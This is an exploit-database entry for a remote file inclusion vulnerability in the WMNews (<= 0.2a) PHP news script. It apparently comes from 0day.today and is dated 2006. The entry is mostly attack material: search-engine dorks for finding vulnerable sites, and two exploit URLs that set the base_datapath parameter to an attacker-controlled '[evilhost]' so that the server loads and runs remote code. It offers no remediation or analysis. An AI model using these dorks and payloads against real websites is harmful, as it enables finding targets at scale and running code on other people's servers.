WMNews <= 0.2a (base_datapath) Remote Inclusion Vulnerability

2006-07-27T00:00:00
ID 1337DAY-ID-610
Type zdt
Reporter uNfz
Modified 2006-07-27T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================================================
WMNews <= 0.2a (base_datapath) Remote Inclusion Vulnerability
=============================================================




       Advisory: WMNews Remote File Include Vulnerability
 Release Date: 2006/07/26
         Author: uNfz
  Critical Level: High
         Vendor: Warta Mikael

--------------------
--------------------

Searching / Dork:

allinurl: *.php?Artid=*
allinurl: *.php?ArtCat=*
allinurl: wmprint.php
allinurl: wmview.php

--------------------

exploration:

/index.php?config=1&base_datapath=http://[evilhost]
/[dir]/index.php?config=1&base_datapath=http://[evilhost]

--------------------



#  0day.today [2018-04-08]  #